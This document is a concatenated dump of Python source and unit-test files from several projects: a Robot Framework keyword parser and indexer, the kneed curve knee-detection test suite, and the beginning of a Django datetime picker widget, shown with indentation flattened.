if '${/}' in arg or '${OUTPUT_DIR}' in arg or '${EXECDIR}' in arg:
f = mkdtemp()
logging.info(
'Possible robot path encountered in library arguments')
logging.debug('In library %s', library)
logging.debug('Instead of %s using: %s', arg, f)
arguments.append(f)
else:
arguments.append(arg)
return arguments
def _parse_xml_doc(self, library):
root = ET.parse(library).getroot()
if ('type', DBJsonSetting.library) in root.items():
return root.attrib['name'], self._parse_xml_lib(root)
else:
raise ValueError('XML file is not library: {0}'.format(
root.attrib['name'])
)
def _parse_xml_lib(self, root):
kws = {}
for element in root.findall('kw'):
kw = {}
kw[DBJsonSetting.keyword_file] = None
kw[DBJsonSetting.keyword_name] = element.attrib['name']
kw[DBJsonSetting.documentation] = element.find('doc').text
tags = [tag.text for tag in element.findall('.//tags/tag')]
kw[DBJsonSetting.tags] = tags
arg = [tag.text for tag in element.findall('.//arguments/arg')]
kw[DBJsonSetting.keyword_arguments] = arg
kws[strip_and_lower(kw[DBJsonSetting.keyword_name])] = kw
return kws
def _parse_robot_data(self, file_path, model):
data = {}
data[DBJsonSetting.file_name] = path.basename(file_path)
data[DBJsonSetting.file_path] = normalise_path(file_path)
data[DBJsonSetting.keywords] = self._get_keywords(model)
data[DBJsonSetting.variables] = self._get_global_variables(model)
lib, res, v_files = self._get_imports(
model,
path.dirname(normalise_path(file_path)),
file_path
)
data[DBJsonSetting.resources] = res
data[DBJsonSetting.libraries] = lib
data[DBJsonSetting.variable_files] = v_files
return data
def _get_keywords(self, model):
kw_data = {}
for kw in model.keywords:
tmp = {}
tmp[DBJsonSetting.keyword_arguments] = kw.args.value
tmp[DBJsonSetting.documentation] = kw.doc.value
tmp[DBJsonSetting.tags] = kw.tags.value
tmp[DBJsonSetting.keyword_name] = kw.name
kw_data[strip_and_lower(kw.name)] = tmp
return kw_data
def _get_imports(self, model, file_dir, file_path):
lib = []
res = []
var_files = []
for setting in model.setting_table.imports:
if setting.type == 'Library':
lib.append(self._format_library(setting, file_dir))
elif setting.type == 'Resource':
res.append(self._format_resource(setting, file_path))
elif setting.type == 'Variables':
var_files.append(self._format_variable_file(setting))
return lib, res, var_files
def _format_library(self, setting, file_dir):
data = {}
lib_name = setting.name
if lib_name.endswith('.py') and not path.isfile(lib_name):
lib_path = path.abspath(path.join(file_dir, lib_name))
lib_name = path.basename(lib_path)
elif lib_name.endswith('.py') and path.isfile(lib_name):
lib_path = normalise_path(lib_name)
lib_name = path.basename(lib_name)
else:
lib_path = None
data[DBJsonSetting.library_name] = lib_name
data[DBJsonSetting.library_alias] = setting.alias
data[DBJsonSetting.library_arguments] = setting.args
data[DBJsonSetting.library_path] = lib_path
return data
def _format_resource(self, setting, file_path):
if path.isabs(setting.name):
return setting.name
else:
c_dir = path.dirname(self.file_path)
resource_path = normalise_path(path.join(c_dir, setting.name))
if not path.isfile(resource_path):
print ('Import failure on file: {0},'.format(file_path),
'could not locate: {0}'.format(setting.name))
return resource_path
def _format_variable_file(self, setting):
data = {}
v_path = normalise_path(path.join(
path.dirname(self.file_path), setting.name))
args = {}
args['variable_file_arguments'] = setting.args
data[v_path] = args
return data
def _get_global_variables(self, model):
var_data = []
for var in model.variable_table.variables:
if var:
var_data.append(var.name)
return var_data
```
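A hedged sketch of driving the parser above (import paths are assumed from the file headers; the suite path is a placeholder):
```python
from data_parser.data_parser import DataParser  # path assumed from the file header
from db_json_settings import DBJsonSetting
parser = DataParser()
# Parse a suite file into a plain dict keyed by the DBJsonSetting constants.
suite_data = parser.parse_suite('/path/to/test_a.robot')  # placeholder path
print(suite_data[DBJsonSetting.file_name])
# Parse a standard Robot Framework library by name.
lib_data = parser.parse_library('BuiltIn')
print(len(lib_data[DBJsonSetting.keywords]))
```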
#### File: test_data/suite_tree/LibraryWithReallyTooLongName.py
```python
from robot.api.deco import keyword
class LibraryWithReallyTooLongName(object):
def long_name_keyword(self, *args):
"""Documentation goes here"""
print(args)
def other_long_name_keyword(self, *args, **kwargs):
"""Other documentation goes here"""
print(args, kwargs)
@keyword(name='Other Name Here')
def not_name(self, arg):
"""def not_name kw name Other Name Here"""
print(arg)
@keyword(name='Other ${arg1} and ${arg2} Too')
def keyword_deco(self, arg1, arg2):
"""lib keyword with emmedded args"""
print(arg1, arg2)
```
#### File: test/unit/test_get_keyword_from_resource.py
```python
import unittest
import env
import shutil
from os import path, mkdir
from index_runner import index_all
from queue.scanner import Scanner
from parser_utils.file_formatter import rf_table_name
from get_keyword import GetKeyword
class TestGetKeywordFromResource(unittest.TestCase):
@classmethod
def setUpClass(cls):
db_base = path.join(
env.RESULTS_DIR,
'database_in_package_dir')
cls.db_dir = path.join(
db_base,
'db_dir'
)
cls.index_dir = path.join(
db_base,
'index_dir',
)
cls.suite_dir = path.join(
env.TEST_DATA_DIR,
'suite_tree'
)
if path.exists(db_base):
shutil.rmtree(db_base)
mkdir(db_base)
mkdir(cls.db_dir)
mkdir(cls.index_dir)
scanner = Scanner()
scanner.scan(
cls.suite_dir,
'robot',
cls.db_dir)
index_all(cls.db_dir, cls.index_dir)
cls.rf_ext = 'robot'
def setUp(self):
self._get_kw = GetKeyword(
table_dir=self.db_dir,
index_dir=self.index_dir,
open_tab=self.get_common_robot_path,
rf_extension=self.rf_ext
)
def test_return_file_and_patter(self):
kw = 'Common Keyword 2'
object_name = None
expected_path = path.normcase(self.get_common_robot_path)
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
object_name = 'common'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
kw = 'common keyword 2'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
kw = 'COMMON KEYWORD 2'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
kw = 'Common_Keyword_2'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
kw = 'CommonKeyword2'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
def test_with_test_a_robot(self):
get_kw = GetKeyword(
table_dir=self.db_dir,
index_dir=self.index_dir,
open_tab=self.test_a_file,
rf_extension=self.rf_ext
)
kw = 'Resource A Keyword 1'
object_name = None
regex, file_path = get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, '(?im)^resource[_ ]?a[_ ]?keyword[_ ]?1$')
self.assertEqual(file_path, self.resource_a_table_file)
def test_get_regex_resource(self):
kw = 'Common Keyword 2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'RUN'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, '(?im)^run$')
kw = 'Common_Keyword_2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'CommonKeyword2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'commonKeyword2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'COMMON KEYWORD 2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'Embedding ${arg} To Keyword Name'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(
regex,
'(?im)^embedding[_ ]?\$\{.+\}[_ ]?to[_ ]?keyword[_ ]?name$'
)
kw = 'Embedding ${arg1} And ${arg2} To Keyword Name'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(
regex,
(
'(?im)^embedding[_ ]?'
'\$\{.+\}[_ ]?'
'and[_ ]?'
'\$\{.+\}[_ ]?'
'to[_ ]?'
'keyword[_ ]?'
'name$'
)
)
def test_rf_data(self):
self.assertTrue(self._get_kw.rf_data(self.get_common_robot_path))
self.assertFalse(self._get_kw.rf_data(self.get_common_variables_path))
def test_embedding_arg_kw(self):
_get_kw = GetKeyword(
table_dir=self.db_dir,
index_dir=self.index_dir,
open_tab=self.test_b_file,
rf_extension=self.rf_ext
)
regex, file_path = _get_kw.return_file_and_patter(
'', 'Embedding arg To Keyword Name')
self.assertEqual(file_path, self.resource_b_table_file)
self.assertEqual(
regex,
'(?im)^embedding[_ ]?\$\{.+\}[_ ]?to[_ ]?keyword[_ ]?name$'
)
@property
def get_common_robot(self):
return 'common.robot'
@property
def get_common_robot_path(self):
return path.join(self.suite_dir, self.get_common_robot)
@property
def get_common_keyword_2_regex(self):
return '(?im)^common[_ ]?keyword[_ ]?2$'
@property
def get_common_variables_path(self):
return path.join(self.suite_dir, 'common_variables.py')
@property
def test_a_file(self):
return path.normcase(path.join(self.suite_dir, 'test_a.robot'))
@property
def resource_a_table_file(self):
return path.normcase(path.join(self.suite_dir, 'resource_a.robot'))
@property
def test_b_file(self):
return path.normcase(path.join(self.suite_dir, 'test_b.robot'))
@property
def resource_b_table_file(self):
return path.normcase(path.join(self.suite_dir, 'resource_b.robot'))
@property
def test_a_table_name(self):
return rf_table_name(self.test_a_file)
@property
def resource_a_table_name(self):
return rf_table_name(self.resource_a_table_file)
```
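For reference, a small stand-alone illustration (hypothetical keyword strings) of the normalised regex shape the assertions above expect from get_regex_resource:
```python
import re
# Same pattern shape as self.get_common_keyword_2_regex in the tests above.
pattern = re.compile('(?im)^common[_ ]?keyword[_ ]?2$')
assert pattern.search('Common_Keyword 2')
assert not pattern.search('Common Keyword 22')
```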
#### File: test/unit/test_jump_to_file.py
```python
import os
import shutil
import unittest
from index_runner import index_all
from jump_to_file import JumpToFile
from queue.scanner import Scanner
import env
class TestJumpToFile(unittest.TestCase):
@classmethod
def setUpClass(cls):
db_base = os.path.join(
env.RESULTS_DIR,
'database_jump_to_file')
cls.db_dir = os.path.join(
db_base,
'db_dir'
)
cls.index_dir = os.path.join(
db_base,
'index_dir',
)
cls.suite_dir = os.path.join(
env.TEST_DATA_DIR,
'suite_tree'
)
if os.path.exists(db_base):
shutil.rmtree(db_base)
os.mkdir(db_base)
os.mkdir(cls.db_dir)
os.mkdir(cls.index_dir)
scanner = Scanner()
scanner.scan(
cls.suite_dir,
'robot',
cls.db_dir)
index_all(cls.db_dir, cls.index_dir)
cls.rf_ext = 'robot'
def setUp(self):
self.jump = JumpToFile()
def test_is_resource(self):
line = 'Resource common.robot'
status = self.jump.is_import(line)
self.assertTrue(status)
line = '| Resource | common.robot |'
status = self.jump.is_import(line)
self.assertTrue(status)
line = '| Resource | common.robot |'
status = self.jump.is_import(line)
self.assertTrue(status)
def test_is_library(self):
line = 'Library Selenium2Library'
status = self.jump.is_import(line)
self.assertTrue(status)
line = '| Library | Selenium2Library |'
status = self.jump.is_import(line)
self.assertTrue(status)
line = '| Library | Selenium2Library |'
status = self.jump.is_import(line)
self.assertTrue(status)
def test_get_import_with_resource_space_separator(self):
line = 'Resource ../bar/foo/foonar/common.robot'
imported = self.jump.get_import(line)
self.assertEqual(imported, '../bar/foo/foonar/common.robot')
def test_get_import_with_resource_space_pipe(self):
line = '| Resource | common.robot |'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'common.robot')
line = '| Resource | common.robot |'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'common.robot')
def test_get_import_with_library_space_separator(self):
line = 'Library common.robot'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'common.robot')
def test_get_import_with_library_space_pipe(self):
line = '| Library | common |'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'common')
line = '| Library | foo/bar/common.py |'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'foo/bar/common.py')
def test_get_import_resource_path(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_path_resource_path(
imported_file='Foo/Bar/CommonFile.robot',
open_tab=open_tab
)
if os.sep == '/':
expected = (
'/workspace/resource/'
'Foo/Bar/CommonFile.robot'
)
else:
expected = (
'C:\\workspace\\resource\\'
'Foo\\Bar\\CommonFile.robot'
)
self.assertEqual(path, expected)
def test_get_import_lib_with_path(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_library_path(
imported_lib='Foo/Bar/CommonLib.py',
open_tab=open_tab,
db_dir=self.db_dir
)
if os.sep == '/':
expected = (
'/workspace/resource/'
'Foo/Bar/CommonLib.py'
)
else:
expected = (
'C:\\workspace\\resource\\'
'Foo\\Bar\\CommonLib.py'
)
self.assertEqual(path, expected)
def test_get_import_lib_with_object_name(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_library_path(
imported_lib='BuiltIn',
open_tab=open_tab,
db_dir=self.db_dir
)
self.assertTrue(os.path.isfile(path))
def test_get_path_with_lib(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_import_path(
import_='BuiltIn',
open_tab=open_tab,
db_dir=self.db_dir
)
self.assertTrue(os.path.isfile(path))
def test_get_path_with_resouce(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_import_path(
import_='Foo/Bar/CommonLib.robot',
open_tab=open_tab,
db_dir=self.db_dir
)
self.assertTrue(path)
```
#### File: test/unit/test_runner_for_index.py
```python
import unittest
import env
import os
import shutil
import re
from time import sleep
from queue.scanner import Scanner
from test_runner_for_scanner import run_process
class TestRunner(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.db_dir = os.path.join(
env.RESULTS_DIR,
'db_dir'
)
cls.workspace = os.path.join(env.TEST_DATA_DIR, 'suite_tree')
scanner = Scanner()
scanner.scan(
cls.workspace,
'robot',
cls.db_dir)
def setUp(self):
self.index_path = os.path.join(
env.RESULTS_DIR,
'index_dir'
)
if os.path.exists(self.index_path):
while os.path.exists(self.index_path):
shutil.rmtree(self.index_path)
sleep(0.1)
os.mkdir(self.index_path)
self.runner = os.path.join(env.SRC_DIR, 'run_index.py')
self.index_path = os.path.join(
env.RESULTS_DIR,
'index_dir'
)
def test_index_all_runner(self):
p_args = [
'python',
self.runner,
'all',
'--db_path',
self.db_dir,
'--index_path',
self.index_path
]
log_file = run_process(p_args)
lines = self.clean_info_messages(log_file)
self.assertFalse(lines)
files = os.listdir(self.index_path)
self.assertEqual(len(files), 14)
def test_index_single(self):
db_files = os.listdir(self.db_dir)
p_args = [
'python',
self.runner,
'single',
'--db_path',
self.db_dir,
'--db_table',
db_files[0],
'--index_path',
self.index_path
]
self.assertEqual(len(os.listdir(self.index_path)), 0)
log_file = run_process(p_args)
lines = self.clean_info_messages(log_file)
self.assertFalse(lines)
self.assertEqual(len(os.listdir(self.index_path)), 1)
log_file = run_process(p_args)
lines = self.clean_info_messages(log_file)
self.assertFalse(lines)
self.assertEqual(len(os.listdir(self.index_path)), 1)
p_args = [
'python',
self.runner,
'single',
'--db_path',
self.db_dir,
'--db_table',
db_files[1],
'--index_path',
self.index_path
]
log_file = run_process(p_args)
lines = self.clean_info_messages(log_file)
self.assertFalse(lines)
self.assertEqual(len(os.listdir(self.index_path)), 2)
def clean_info_messages(self, log_file):
f = open(log_file)
# Strip away S2L info messages
pattern = re.compile(
r'(?im)^INFO:'
)
lines = []
for line in f.readlines():
if not pattern.search(line):
lines.append(line)
f.close()
return lines
``` |
{
"source": "JimPrudent/kneed",
"score": 3
} |
#### File: kneed/tests/test_sample.py
```python
import math
import matplotlib.pyplot as plt
import numpy as np
import pytest
from kneed.data_generator import DataGenerator as dg
from kneed.knee_locator import KneeLocator
from kneed.shape_detector import find_shape
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_figure2(interp_method):
"""From the kneedle manuscript"""
x, y = dg.figure2()
kl = KneeLocator(x, y, S=1.0, curve="concave", interp_method=interp_method)
assert math.isclose(kl.knee, 0.22, rel_tol=0.05)
assert math.isclose(kl.elbow, 0.22, rel_tol=0.05)
assert math.isclose(kl.norm_elbow, kl.knee, rel_tol=0.05)
def test_NoisyGaussian():
"""From the Kneedle manuscript"""
x, y = dg.noisy_gaussian(mu=50, sigma=10, N=1000, seed=42)
kl = KneeLocator(
x,
y,
S=1.0,
curve="concave",
interp_method="polynomial",
polynomial_degree=11,
online=True,
)
assert math.isclose(kl.knee, 63.0, rel_tol=1e-02)
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_concave_increasing(interp_method):
"""test a concave increasing function"""
x, y = dg().concave_increasing()
kn = KneeLocator(x, y, curve="concave", interp_method=interp_method)
assert kn.knee == 2
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_concave_decreasing(interp_method):
"""test a concave decreasing function"""
x, y = dg.concave_decreasing()
kn = KneeLocator(
x, y, curve="concave", direction="decreasing", interp_method=interp_method
)
assert kn.knee == 7
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_convex_increasing(interp_method):
"""test a convex increasing function"""
x, y = dg.convex_increasing()
kl = KneeLocator(x, y, curve="convex", interp_method=interp_method)
assert kl.knee == 7
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_convex_decreasing(interp_method):
"""test a convex decreasing function"""
x, y = dg.convex_decreasing()
kl = KneeLocator(
x, y, curve="convex", direction="decreasing", interp_method=interp_method
)
assert kl.knee == 2
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_concave_increasing_truncated(interp_method):
"""test a truncated concave increasing function"""
x, y = dg.concave_increasing()
kl = KneeLocator(
x[:-3] / 10, y[:-3] / 10, curve="concave", interp_method=interp_method
)
assert kl.knee == 0.2
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_concave_decreasing_truncated(interp_method):
"""test a truncated concave decreasing function"""
x, y = dg.concave_decreasing()
kl = KneeLocator(
x[:-3] / 10,
y[:-3] / 10,
curve="concave",
direction="decreasing",
interp_method=interp_method,
)
assert kl.knee == 0.4
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_convex_increasing_truncated(interp_method):
"""test a truncated convex increasing function"""
x, y = dg.convex_increasing()
kl = KneeLocator(
x[:-3] / 10, y[:-3] / 10, curve="convex", interp_method=interp_method
)
assert kl.knee == 0.4
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_convex_decreasing_truncated(interp_method):
"""test a truncated convex decreasing function"""
x, y = dg.convex_decreasing()
kl = KneeLocator(
x[:-3] / 10,
y[:-3] / 10,
curve="convex",
direction="decreasing",
interp_method=interp_method,
)
assert kl.knee == 0.2
@pytest.mark.parametrize(
"interp_method, expected", [("interp1d", 26), ("polynomial", 28)]
)
def test_convex_decreasing_bumpy(interp_method, expected):
"""test a bumpy convex decreasing function"""
x, y = dg.bumpy()
kl = KneeLocator(
x, y, curve="convex", direction="decreasing", interp_method=interp_method
)
assert kl.knee == expected
@pytest.mark.parametrize("online, expected", [(True, 482), (False, 22)])
def test_gamma_online_offline(online, expected):
"""Tests online and offline knee detection.
Note that with a large number of samples the result is highly sensitive to the S parameter.
"""
np.random.seed(23)
n = 1000
x = range(1, n + 1)
y = sorted(np.random.gamma(0.5, 1.0, n), reverse=True)
kl = KneeLocator(x, y, curve="convex", direction="decreasing", online=online)
assert kl.knee == expected
def test_sensitivity():
"""Test the S parameter -- where S is the number of flat points to identify before calling a knee"""
np.random.seed(23)
sensitivity = [1, 3, 5, 10, 100, 200, 400]
detected_knees = []
expected_knees = [43, 137, 178, 258, 305, 482, 482]
n = 1000
x = range(1, n + 1)
y = sorted(np.random.gamma(0.5, 1.0, n), reverse=True)
for s, expected_knee in zip(sensitivity, expected_knees):
kl = KneeLocator(x, y, curve="convex", direction="decreasing", S=s)
detected_knees.append(kl.knee)
assert kl.knee == expected_knee
def test_sine():
x = np.arange(0, 10, 0.1)
y_sin = np.sin(x)
sine_combos = [
("decreasing", "convex"),
("increasing", "convex"),
("increasing", "concave"),
("decreasing", "concave"),
]
expected_knees = [4.5, 4.9, 7.7, 1.8]
detected_knees = []
for direction, curve in sine_combos:
kl_sine = KneeLocator(
x, y_sin, direction=direction, curve=curve, S=1, online=True
)
detected_knees.append(kl_sine.knee)
assert np.isclose(expected_knees, detected_knees).all()
def test_list_input():
"""Indirectly test that flip works on lists as input"""
x, y = dg.figure2()
kl = KneeLocator(
x.tolist(), y.tolist(), S=1.0, curve="concave", interp_method="polynomial"
)
assert math.isclose(kl.knee, 0.22, rel_tol=0.05)
def test_flat_maxima():
"""The global maxima has a sequentially equal value in the difference curve"""
x = [
0,
1.0,
2.0,
3.0,
4.0,
5.0,
6.0,
7.0,
8.0,
9.0,
10.0,
11.0,
12.0,
13.0,
14.0,
15.0,
16.0,
17.0,
]
y = [
1,
0.787701317715959,
0.7437774524158126,
0.6559297218155198,
0.5065885797950219,
0.36749633967789164,
0.2547584187408492,
0.16251830161054173,
0.10395314787701318,
0.06734992679355783,
0.043923865300146414,
0.027818448023426062,
0.01903367496339678,
0.013177159590043924,
0.010248901903367497,
0.007320644216691069,
0.005856515373352855,
0.004392386530014641,
]
# When S=0.0 the first local maximum is found.
kl = KneeLocator(x, y, curve="convex", direction="decreasing", S=0.0)
assert math.isclose(kl.knee, 1.0, rel_tol=0.05)
# When S=1.0 the global maximum is found.
kl = KneeLocator(x, y, curve="convex", direction="decreasing", S=1.0)
assert math.isclose(kl.knee, 8.0, rel_tol=0.05)
def test_all_knees():
x, y = dg.bumpy()
kl = KneeLocator(x, y, curve="convex", direction="decreasing", online=True)
assert np.isclose(sorted(kl.all_elbows), [26, 31, 41, 46, 53]).all()
assert np.isclose(
sorted(kl.all_norm_elbows),
[
0.2921348314606742,
0.348314606741573,
0.4606741573033708,
0.5168539325842696,
0.5955056179775281,
],
).all()
def test_y():
"""Test the y value"""
x, y = dg.figure2()
kl = KneeLocator(x, y, S=1.0, curve="concave", interp_method="interp1d")
assert math.isclose(kl.knee_y, 1.897, rel_tol=0.03)
assert math.isclose(kl.all_knees_y[0], 1.897, rel_tol=0.03)
assert math.isclose(kl.norm_knee_y, 0.758, rel_tol=0.03)
assert math.isclose(kl.all_norm_knees_y[0], 0.758, rel_tol=0.03)
assert math.isclose(kl.elbow_y, 1.897, rel_tol=0.03)
assert math.isclose(kl.all_elbows_y[0], 1.897, rel_tol=0.03)
assert math.isclose(kl.norm_elbow_y, 0.758, rel_tol=0.03)
assert math.isclose(kl.all_norm_elbows_y[0], 0.758, rel_tol=0.03)
def test_y_no_knee():
"""Test the y value, if there is no knee found."""
kl = KneeLocator(
np.array([1, 2, 3]),
np.array([0.90483742, 0.81873075, 0.74081822]),
S=1.0,
curve="convex",
direction="decreasing",
interp_method="interp1d",
online=False,
)
assert kl.knee_y is None
assert kl.norm_knee_y is None
def test_interp_method():
"""Test that the interp_method argument is valid."""
x, y = dg.figure2()
with pytest.raises(ValueError):
kl = KneeLocator(x, y, interp_method="not_a_method")
def test_x_equals_y():
"""Test that a runtime warning is raised when no maxima are found"""
x = range(10)
y = [1] * len(x)
with pytest.warns(RuntimeWarning):
kl = KneeLocator(x, y)
def test_plot_knee_normalized():
"""Test that plotting is functional"""
x, y = dg.figure2()
kl = KneeLocator(x, y, S=1.0, curve="concave", interp_method="interp1d")
num_figures_before = plt.gcf().number
kl.plot_knee_normalized()
num_figures_after = plt.gcf().number
assert num_figures_before < num_figures_after
def test_plot_knee():
"""Test that plotting is functional"""
x, y = dg.figure2()
kl = KneeLocator(x, y, S=1.0, curve="concave", interp_method="interp1d")
num_figures_before = plt.gcf().number
kl.plot_knee()
num_figures_after = plt.gcf().number
assert num_figures_before < num_figures_after
def test_logistic():
y = np.array(
[
2.00855493e-45,
1.10299045e-43,
4.48168384e-42,
1.22376580e-41,
5.10688883e-40,
1.18778110e-38,
5.88777891e-35,
4.25317895e-34,
4.06507035e-33,
6.88084518e-32,
2.99321831e-31,
1.13291723e-30,
1.05244482e-28,
2.67578448e-27,
1.22522190e-26,
2.36517846e-26,
8.30369408e-26,
1.24303033e-25,
2.27726918e-25,
1.06330422e-24,
5.55017673e-24,
1.92068553e-23,
3.31361011e-23,
1.13575247e-22,
1.75386416e-22,
6.52680518e-22,
2.05106011e-21,
6.37285545e-21,
4.16125535e-20,
1.12709507e-19,
5.75853420e-19,
1.73333796e-18,
2.70099890e-18,
7.53254646e-18,
1.38139433e-17,
3.60081965e-17,
8.08419977e-17,
1.86378584e-16,
5.36224556e-16,
8.89404640e-16,
2.34045104e-15,
4.72168880e-15,
6.84378992e-15,
2.26898430e-14,
3.10087652e-14,
2.78081199e-13,
1.06479577e-12,
2.81002203e-12,
4.22067092e-12,
9.27095863e-12,
1.54519738e-11,
4.53347819e-11,
1.35564441e-10,
2.35242087e-10,
4.45253545e-10,
9.78613696e-10,
1.53140922e-09,
2.81648560e-09,
6.70890436e-09,
1.49724785e-08,
5.59553565e-08,
1.39510811e-07,
7.64761811e-07,
1.40723957e-06,
4.97638863e-06,
2.12817943e-05,
3.26471410e-05,
1.02599591e-04,
3.18774179e-04,
5.67297630e-04,
9.22732716e-04,
1.17445643e-03,
3.59279384e-03,
3.61936491e-02,
6.39493416e-02,
1.29304829e-01,
1.72272215e-01,
3.46945901e-01,
5.02826602e-01,
6.24800042e-01,
7.38412957e-01,
7.59931663e-01,
7.73374421e-01,
7.91421897e-01,
8.29325597e-01,
8.57718637e-01,
8.73286061e-01,
8.77056835e-01,
8.93173768e-01,
9.05435646e-01,
9.17217910e-01,
9.19119179e-01,
9.24810910e-01,
9.26306908e-01,
9.28621233e-01,
9.33855835e-01,
9.37263027e-01,
9.41651642e-01,
]
)
x = np.array(
[
1.0,
2.0,
3.0,
4.0,
5.0,
6.0,
7.0,
8.0,
9.0,
10.0,
11.0,
12.0,
13.0,
14.0,
15.0,
16.0,
17.0,
18.0,
19.0,
20.0,
21.0,
22.0,
23.0,
24.0,
25.0,
26.0,
27.0,
28.0,
29.0,
30.0,
31.0,
32.0,
33.0,
34.0,
35.0,
36.0,
37.0,
38.0,
39.0,
40.0,
41.0,
42.0,
43.0,
44.0,
45.0,
46.0,
47.0,
48.0,
49.0,
50.0,
51.0,
52.0,
53.0,
54.0,
55.0,
56.0,
57.0,
58.0,
59.0,
60.0,
61.0,
62.0,
63.0,
64.0,
65.0,
66.0,
67.0,
68.0,
69.0,
70.0,
71.0,
72.0,
73.0,
74.0,
75.0,
76.0,
77.0,
78.0,
79.0,
80.0,
81.0,
82.0,
83.0,
84.0,
85.0,
86.0,
87.0,
88.0,
89.0,
90.0,
91.0,
92.0,
93.0,
94.0,
95.0,
96.0,
97.0,
98.0,
]
)
kl = KneeLocator(x, y, curve="convex", direction="increasing", online=True,)
assert kl.knee == 73
def test_valid_curve_direction():
"""Test that arguments to curve and direction are valid"""
with pytest.raises(ValueError):
kl = KneeLocator(range(3), [1, 3, 5], curve="bad curve")
with pytest.raises(ValueError):
kl = KneeLocator(range(3), [1, 3, 5], direction="bad direction")
def test_find_shape():
"""Test that find_shape can detect the right shape of curve line"""
x, y = dg.concave_increasing()
direction, curve = find_shape(x, y)
assert direction == 'increasing'
assert curve == 'concave'
x, y = dg.concave_decreasing()
direction, curve = find_shape(x, y)
assert direction == 'decreasing'
assert curve == 'concave'
x, y = dg.convex_decreasing()
direction, curve = find_shape(x, y)
assert direction == 'decreasing'
assert curve == 'convex'
x, y = dg.convex_increasing()
direction, curve = find_shape(x, y)
assert direction == 'increasing'
assert curve == 'convex'
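# --- Illustrative sketch (not one of the original tests) ---
# A minimal end-to-end call on the same noisy gamma data used above; with the
# default S=1.0 and online=False this matches the offline case in
# test_gamma_online_offline.
#
# np.random.seed(23)
# x = range(1, 1001)
# y = sorted(np.random.gamma(0.5, 1.0, 1000), reverse=True)
# kl = KneeLocator(x, y, curve="convex", direction="decreasing")
# print(kl.knee)  # 22 for this seed, per test_gamma_online_offline above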
``` |
{
"source": "jimr/django-datetime-widget",
"score": 2
} |
#### File: django-datetime-widget/datetimewidget/widgets.py
```python
__author__ = '<NAME>'
import re
import uuid
from django.forms.widgets import MultiWidget, to_current_timezone, DateTimeInput
from django.utils.translation import ugettext as _
from datetime import datetime
from django.utils import translation
I18N = """
$.fn.datetimepicker.dates['en'] = {
days: %s,
daysShort: %s,
daysMin: %s,
months: %s,
monthsShort: %s,
meridiem: %s,
suffix: %s,
today: %s
};
"""
datetimepicker_options = """
format : '%s',
startDate : '%s',
endDate : '%s',
weekStart : %s,
daysOfWeekDisabled : %s,
autoclose : %s,
startView : %s,
minView : %s,
maxView : %s,
todayBtn : %s,
todayHighlight : %s,
minuteStep : %s,
pickerPosition : '%s',
showMeridian : %s,
language : '%s',
"""
dateConversion = {
'P' : '%p',
'ss' : '%S',
'ii' : '%M',
'hh' : '%H',
'HH' : '%I',
'dd' : '%d',
'mm' : '%m',
#'M' : '%b',
#'MM' : '%B',
'yy' : '%y',
'yyyy' : '%Y',
}
class DateTimeWidget(MultiWidget):
def __init__(self, attrs=None, options = {}):
if attrs is None:
attrs = {'readonly':''}
self.option = ()
self.option += (options.get('format','dd/mm/yyyy hh:ii'),)
self.option += (options.get('startDate',''),)
self.option += (options.get('endDate',''),)
self.option += (options.get('weekStart','0'),)
self.option += (options.get('daysOfWeekDisabled','[]'),)
self.option += (options.get('autoclose','false'),)
self.option += (options.get('startView','2'),)
